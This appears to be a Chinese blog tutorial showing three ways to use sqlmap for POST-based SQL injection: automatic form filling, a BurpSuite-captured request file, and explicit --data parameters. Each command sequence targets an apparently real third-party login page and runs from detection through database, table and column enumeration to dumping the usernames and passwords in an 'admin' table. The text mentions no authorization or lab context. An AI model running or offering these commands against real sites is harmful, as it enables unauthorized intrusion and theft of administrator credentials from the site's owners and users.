不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!
一、自动填写表单
自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:
1、判断是否有post注入?
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!
结果如下图:
从这里,可以得到数据库是:Microsoft SQL Server,也就是mssql;
总之,一句话总结即可!IIS+ASP+windows+mssql;
这里重点说一下,Sql Server(mssql)数据库类似于mysql,数据库结构如下:
- 数据库A -> 表名 -> 列名 -> 数据
- 数据库B -> 表名 -> 列名 -> 数据
因此:mssql注入和mysql注入其实都差不多。
2、查找数据库
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --dbs
注意:如果遇到数据库非常多,而且我们也不知道管理用户名和密码存放在哪个数据库中?又应该怎么办呢?
查找当前的数据库
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --current-db后面就不截图了,都很简单,这里找到了当前数据库是“vip_0730"。
3、查找表名
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 --tables
4、查找列名
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin --columns
5、爆出数据
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin -C user_name,user_pwd --dump从这里就可以爆出 vip_0730 数据库 中 admin 表的 user_name 和 user_pwd 列的数据了。
二、Sqlmap结合BurpSuite
这是Sqlmap工具POST注入的第二种方法;这种方法要比自动填写表单准确性高些,但是:自动表单会简单快一点。具体步骤如下:
1、抓包
2、全选抓包的数据,右键 -> Copy 就可以保存到 1.txt 文档中;
3、sqlmap -r 指定文件
root@Kali:~# sqlmap -r '/home/1.txt'
4、查找当前数据库
root@Kali:~# sqlmap -r '/home/1.txt' --current-db
后面的这些和前面的就没什么区别了,就不继续讲重复的内容了。下面直接来说说Sqlmap POST注入第三种方法吧!
三、指定表单注入
指定表单注入是Sqlmap POST注入第三种方法,这个其实也需要抓包的。当然,不抓也可以,查看源代码等什么的也不是不可以,只是抓包比较精准而已。只要能知道指定的表单数据就可以了!
例如:我这里用指定表单注入,你只要能获取到“userid=aaa&passwd=bbbb”这个就可以了,不管你是用哪种途径获取到的都可以。
1、检测是否有注入?
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb"
2、查找当前数据库
root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb" --current-db
到这里就算正式结束了,因为:后面的这些步骤和前面讲的并没什么区别了,重复的内容不太喜欢讲好几次,没必要。
